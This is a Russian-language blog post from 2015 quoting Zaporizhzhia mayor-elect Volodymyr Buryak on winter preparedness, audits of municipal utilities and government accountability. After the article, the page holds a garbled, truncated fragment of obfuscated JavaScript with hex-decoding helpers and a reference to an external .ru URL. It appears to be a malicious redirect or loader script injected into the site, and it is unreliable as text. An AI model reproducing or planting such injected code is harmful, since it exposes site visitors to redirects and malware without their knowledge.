Хроники и Комментарии

Власть, расследования, сатира, фото

Буряк отказался от «медового месяца». Инженер, женившийся на городской власти, рвется к работе

Posted by operkor на 23 ноября, 2015

5Главный инженер «Запорожстали» Владимир Буряк, победивший на выборах мэра Запорожья, но еще не ставший мэром,  дал интервью «запорожсталевскому» телеканалу ТВ-5, в котором рассказал о своих ближайших планах в работе на новой должности:  «Я привык работать так: если ты переходишь на новую работу или должность, то нет времени на раскачку – нужно работать. У нас нет времени на «медовый месяц» — на послевыборную эйфорию. Нужно начать работать, и работать с первого дня.

Прежде всего нам надо решить важные вопросы в городском хозяйстве. Впереди зима и город должен встретить и провести ее достойно. Прежде всего, нужно обеспечить наши школы, больницы, предприятия теплоносителями, электроэнергией, водой, газом. Мы должны сделать все, чтобы погодные условия не стали для нас коллапсом – как это было прежде. А для этого следует проверить всю спецтехнику, посыпочные материалы и так.

Параллельно мы будем проводить аудит хозяйственной деятельности каждого коммунального предприятия и одновременно решать вопросы кадровой политики. В каждом коммунальном предприятии будут работать специалисты и каждая копейка, которую получает коммунальное предприятие с бюджета, должна возвращаться жителям города Запорожье реальными услугами.

Все представители власти — будь то город, будь то область, будь то страна – они все менеджеры, они все наемники, их наняла громада и они обязаны работать на благо громады прежде всего, и открыто отчитываться пред громадой, а не перед какими-то политическими лидерами. Это самое главное на сегодняшний день — открытость власти перед жителями. Это залог успеха».

Отметим, перед журналистами Владимир Буряк пока не выступил. В течение всей избирательной кампании он появлялся на интервью только в СМИ своего шефа — Рината Ахметова, сообщает zanoza-news.com

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: